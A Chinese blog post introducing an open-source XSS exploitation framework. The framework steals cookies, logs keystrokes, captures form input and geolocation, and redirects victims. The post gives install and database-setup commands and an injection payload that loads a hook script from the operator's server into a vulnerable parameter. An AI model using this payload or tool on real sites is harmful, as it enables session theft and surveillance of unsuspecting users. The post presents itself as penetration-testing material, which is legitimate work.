这个工具可以帮你自动化XSS漏洞的发现和利用:XSS-Exploitation-Tool:一个强大的XSS漏洞扫描与利用工具

最新推荐文章于 2024-05-03 22:00:02 发布
最新推荐文章于 2024-05-03 22:00:02 发布
阅读量2.4k 收藏 15
点赞数 2
文章标签: 自动化 xss 运维 web安全 网络安全 黑客 网络空间安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jklbnm12/article/details/131867368
版权

一、XSS-Exploitation-Tool简介

跨站脚本(XSS)是一种常见的网络安全漏洞,它允许攻击者在目标网站上注入恶意的客户端代码,从而影响或者控制目标用户的浏览器行为。XSS漏洞可能导致用户的隐私泄露、账号被盗、网站被篡改等严重后果。

为了帮助渗透测试人员和安全研究人员快速地识别和利用XSS漏洞,我们开发了XSS-Exploitation-Tool,这是一款功能强大的XSS漏洞扫描与利用工具,专为渗透测试人员设计。

需要注意的是,该工具仅出于教育目的设计和开发,请不要将其用于真实环境。

二、XSS-Exploitation-Tool功能介绍

XSS-Exploitation-Tool具有以下功能:

功能说明
获取关于目标浏览器的技术数据可以获取目标浏览器的类型、版本、操作系统、语言等信息
获取目标用户的地理坐标位置可以获取目标用户的经纬度、国家、城市等信息
获取已挂起/已访问的网页快照可以获取目标用户访问过或者正在访问的网页的截图
获取已挂起/已访问的网页源代码可以获取目标用户访问过或者正在访问的网页的源代码
提取表单输入字段数据可以获取目标用户在表单中输入过或者正在输入的数据
获取Cookie数据可以获取目标用户在浏览器中存储的Cookie数据
键盘记录功能可以记录目标用户在浏览器中输入的所有按键
显示警告弹窗可以在目标用户的浏览器中显示一个自定义的警告弹窗
重定向用户可以将目标用户的浏览器重定向到一个自定义的网址

三、XSS-Exploitation-Tool安装方法

当前版本的XSS-Exploitation-Tool已在Debian 11上进行过测试。

在使用该工具之前,你还需要安装Apache、MySQL数据库和PHP相关模块:

# 安装Apache、MySQL数据库和PHP相关模块
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom

# 删除默认的index.html文件
$ sudo rm /var/www/index.html

接下来,你可以直接使用下列命令将该项目源码克隆至本地:

# 安装git
$ sudo apt-get install git

# 克隆项目源码
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git

# 移动项目源码到/var/www/html/目录下
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

然后安装composer,并安装该工具所需的其他依赖组件:

# 安装composer
$ sudo apt-get install composer

# 进入/var/www/html/目录
$ cd /var/www/html/

# 修改文件夹权限
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/

# 安装依赖组件
$ composer install

# 恢复文件夹权限
$ sudo chown -R www-data:$www-data /var/www/

安装完成后,使用下列命令初始化数据库:

# 进入MySQL数据库
$ sudo mysql

# 创建一个新的用户
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';

# 刷新权限
MariaDB [(none)]> flush privileges;

# 退出MySQL数据库
MariaDB [(none)]> quit

创建好数据库之后,访问下列地址即可:

http://server-ip/reset_database.php

四、XSS-Exploitation-Tool使用方法

使用XSS-Exploitation-Tool的过程可以分为以下几个步骤:

  • 步骤一:创建一个页面来插入JavaScript钩子文件。JavaScript钩子文件是一个用于与服务器端通信和执行命令的脚本文件,我们需要使用服务器端的IP地址替换文件中的第一行数据:

    // 修改服务器端IP地址
var address = "your server ip";

    然后,我们可以在任意一个网页上插入这个钩子文件,例如:

    ?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

  • 步骤二:等待目标用户访问这个设置了钩子文件的页面。当目标用户访问这个页面时,他们的浏览器就会加载并执行这个钩子文件,从而与服务器端建立连接,并发送一些基本的信息,如浏览器类型、版本、语言等。

  • 步骤三:在服务器端查看目标浏览器列表。当服务器端收到目标用户的信息时,它就会在网页上列出目标浏览器列表,我们可以点击每个浏览器的ID来查看更多的信息,如操作系统、地理位置、网页快照等。

  • 步骤四:在服务器端发送命令给目标浏览器。当我们选择了一个目标浏览器后,我们就可以在网页上输入一些命令来控制目标浏览器,如获取Cookie数据、显示警告弹窗、重定向用户等。我们可以在命令框中输入help来查看可用的命令列表。

工具运行截图

在这里插入图片描述
在这里插入图片描述

许可证协议 本项目的开发与发布遵循GPL-3.0开源许可证协议。

项目地址 XSS-Exploitation-Tool:【GitHub传送门】

网安溦寀
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
XSS漏洞扫描器(2种方法)
哆啦安全
12-14 5298
​1.使用ppmap检测和利用XSS漏洞 sudo apt-get install chromium ​ sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt...
大范围XSS扫描工具XSS-Freak,BurpSuite随机用户代理,Hades 静态代码审核系统
代码讲故事
09-16 466
大范围XSS扫描工具XSS-Freak,BurpSuite随机用户代理,Hades 静态代码审核系统。
2024年网络安全最新XSStrike工具的安装及使用(包括实战应用)(2)
最新发布
05-03 932
更新依赖模块,命令如下(首先进入xsstrike目录)04 使用方法测试GET传参的网页:payload=1”测试POST数据:该工具用于检测 Web 应用程序中的 XSS 漏洞,支持多种扫描选项和自定义设置。get请求练习测试post请求练习测试实战测试发现一个登录页面 用户名输入什么都显示正确,怀疑此处有注入点。放到xsstrike跑因为是post请求所以用测试post请求的命令成功拿下,使用任意payload,开始验证这时候还要普及一个xss漏洞,因为这个网站刚好有!
XSS跨站脚本攻击
weixin_68057794的博客
08-08 879
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。从上面中的一段话,可以得知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。...
推荐好用的XSS漏洞扫描利用工具
喜欢Python编程的程序员柚柚呀
12-19 1634
toxssin 是一种开源渗透测试工具,可自动执行跨站脚本 (XSS) 漏洞利用过程。它由一个 https 服务器组成,它充当为该工具 (toxin.js) 提供动力的恶意 JavaScript 有效负载生成的流量的解释器。
XSS攻击和跨站脚本安全漏洞防护
Zyw907155124的博客
09-05 3880
存储型XSS可以持续攻击用户,在用户提交了包含XSS代码的数据存储到数据库后,每当用户在浏览网页查询对应数据库中的数据时,那些包含XSS代码的数据就会在服务器解析并加载,当浏览器读到XSS代码后,会当做正常的HTML和JS解析并执行,于是发生存储型XSS攻击。**例如**:下面JSP代码片段的功能是根据一个已知用户雇员ID(id)从数据库中查询出该用户的地址,并显示在JSP页面上。如果address的值是由用户提供的,且存入数据库时没有进行合理的校验,那么攻击者就可以利用上面的代码进行存储型XSS攻击。
10大漏洞评估和渗透测试工具
Karka_的博客
06-07 1093
专为企业设计的强大漏洞扫描和管理工具,它可以检测和利用 SQL 注入和 XSS漏洞。针对中小型企业的 Web 应用程序漏洞扫描程序,但也可以扩展到更大的组织。它可以检测 SQL 注入、XSS 和其他威胁。Intruder是一种在线漏洞扫描程序,可通过在线自动检测各种漏洞。具有现成利用代码的可靠渗透测试框架,Metasploit 项目提供了大量漏洞利用代码和相关漏洞的信息,可以安全人员识别安全问题、验证漏洞安全性评估。Nessus是目前全世界最多人使用的系统漏洞扫描与分析软件。
findom-xss:一个基于DOM的快速XSS漏洞扫描程序,非常简单
04-22
FinDOM-XSS FinDOM-XSS是一种工具,可让您快速找到可能的和/或潜在的基于DOM的XSS漏洞。安装$ git clone https://github.com/dwisiswant0/findom-xss.git --recurse-submodules依赖项: 用法要在目标上运行该工具,...
第一节 自动化xss挖掘介绍-01
09-15
xsser是一款功能强大且灵活的自动化XSS挖掘工具,旨在Web安全测试员和开发者快速发现和修复Web应用程序中的XSS漏洞xsser工具可以自动化地扫描Web应用程序,检测潜在的XSS漏洞,并提供详细的漏洞报告。 xsser...
XSS_Rays.zip_XSS Rays 下载_tool_xss扫描_xss扫描器_漏洞扫描
09-22
最近The Spanner发布了一个名为XSS Rays的 XSS漏洞扫描器。这tool有点意思,是使用JS写的,JS遍历目标的link、form,然后构造测试用例去测试,可以发现DOM的XSS(当然是在测试用例打对了的情况下)。它的调用方式也...
XSpear:功能强大XSS扫描和参数分析工具&gem
02-02
X矛XSpear是针对Ruby宝石的XSS扫描仪目录主要特点基于模式匹配的XSS扫描在无头浏览器(使用Selenium)上检测alert confirm prompt事件XSS保护绕过和反射(或所有)参数的测试请求/响应反射参数所有参数(适用于XSS和...
XSS 小助手 V1.0 -XSS一定要用到的小工具必备
05-03
跨站一定要用的小工具... 很不错的,功能有很多,玩hackgame也一定会用到滴.
XSS漏洞扫描 XSS漏洞扫描
07-08
XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描
扫描sql注入与xss攻击的牛b工具
11-02
扫描sql注射与xss攻击的牛b工具,适合新手初入渗透测试使用的工具,很好有效辅助你们对网站的渗透测试。
奇安信安全扫描漏洞解决路径遍历和存储型xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
XSS跨站脚本(web应用)——XSS相关工具及使用(四)
Gjqhs的博客
02-24 2051
本章目的 普及XSS相关工具的简单使用,在DVWA中练习Dom型XSS方法 DVWA Dom XSS 相关代码 将get参数中的default的值写入页面中的<option>节点 if (document.location.href.indexOf("default=")>=0){var lang = document.location.href.substring( document.location.href.indexOf("default=")+8);document.
教大家如何找XSS漏洞并且利用
liuhyusb的博客
06-19 1590
cross sitescript跨站脚本攻击,为了避免和css重复,就叫XSS了,是客户端脚本安全中的头号大敌。
渗透测试之分享常用工具、插件和脚本(干货)
保持微笑的博客
10-31 3841
BRUP插件:漏洞挖掘插件:Autorize、CSRF Token Tracker、XSS Validator、Turbo Intruder辅助插件:HaE、sqlmap4brup++、hackbar、Software Vulnerability Scanner浏览器插件: wappalyzer、MySSL、Cookie Editor脚本:1.图形化渗透测试工具集——GUI_Tools5.ip解码6.awvs批量扫描。
安全测试-XSS攻击
qq_42008891的博客
03-08 588
XSS攻击概念介绍,常规XSS攻击测试方法,XSStrike工具介绍及常规测试命令
xss漏洞检测工具推荐
06-01
推荐以下几款xss漏洞检测工具: 1. OWASP ZAP:一款功能强大的开源Web应用程序安全扫描工具,支持xss漏洞检测。 2. Acunetix:一款流行的Web应用程序安全扫描工具,提供全面的xss漏洞检测功能。 3. Burp Suite:一款专业的Web应用程序渗透测试工具,提供强大xss漏洞检测和利用功能。 4. Nessus:一款流行的网络漏洞扫描器,可用于检测xss漏洞和其他Web应用程序安全问题。 5. Nexpose:一款全面的漏洞管理和漏洞扫描工具,可用于检测xss漏洞和其他Web应用程序安全问题。 请注意,在使用任何xss漏洞检测工具之前,请确保您已经获得了授权,并已经获得了目标网站的所有者的明确许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安溦寀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值